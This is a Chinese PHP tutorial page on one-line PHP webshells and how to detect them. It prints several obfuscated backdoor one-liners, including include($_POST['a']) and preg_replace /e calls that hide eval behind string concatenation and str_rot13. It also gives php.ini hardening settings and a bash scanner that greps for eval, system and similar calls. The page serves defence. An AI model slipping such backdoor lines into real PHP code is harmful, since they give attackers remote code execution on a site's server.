网站地图    收藏   

主页 > 后端 > 网站安全 >

PHP一句话木马及查杀 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 常见的木马基本上有如下特征1.接收外部变量常见如:$_GET,$_POST更加隐蔽的$_FILES,$_REQUEST2.执行函数获取数据后还需执行它常见如:eval,assert,preg_replace隐藏变种:include($_POST[#39;a#39;]);$hh = ......

常见的木马基本上有如下特征
1.接收外部变量
常见如:$_GET,$_POST
更加隐蔽的$_FILES,$_REQUEST…

2.执行函数
获取数据后还需执行它
常见如:eval,assert,preg_replace
隐藏变种:

include($_POST['a']);
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
使用urldecode,gzinflate,base64_decode等加密函数

3.写入文件
获取更多的权限
如:copy,file_get_contents,exec

一般的建议是打开safe_mode 或使用disable_functions 等来提升安全性;
可能有些程序无法正常运行,基本的安全设置
php.ini中

expose_php = OFF
register_globals = Off
display_errors = Off
cgi.fix_pathinfo=0
magic_quotes_gpc = On
allow_url_fopen = Off
allow_url_include = Off
配置open_basedir
查找木马脚本 www.2cto.com
查找隐藏特征码及入口可以找出大部分的木马.

#!/bin/bash
 
findpath=./
logfile=findtrojan.log
 
echo -e $(date +%Y-%m-%d_%H:%M:%S)" start\r" >>$logfile
echo -e '============changetime list==========\r\n' >> ${logfile}
find ${findpath} -name "*.php" -ctime -3 -type f -exec ls -l {} \; >> ${logfile}
 
echo -e '============nouser file list==========\r\n' >> ${logfile}
find  ${findpath} -nouser -nogroup -type f -exec ls -l {} \; >> ${logfile}
 
echo -e '============php one word trojan ==========\r\n' >> ${logfile}
find ${findpath} -name "*.php" -exec egrep -I -i -C1 -H  'exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS' {} \; >> ${logfile}
#使用使用-l 代替-C1 -H 可以只打印文件名
echo -e $(date +%Y-%m-%d_%H:%M:%S)" end\r" >>$logfile
 
more $logfile

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论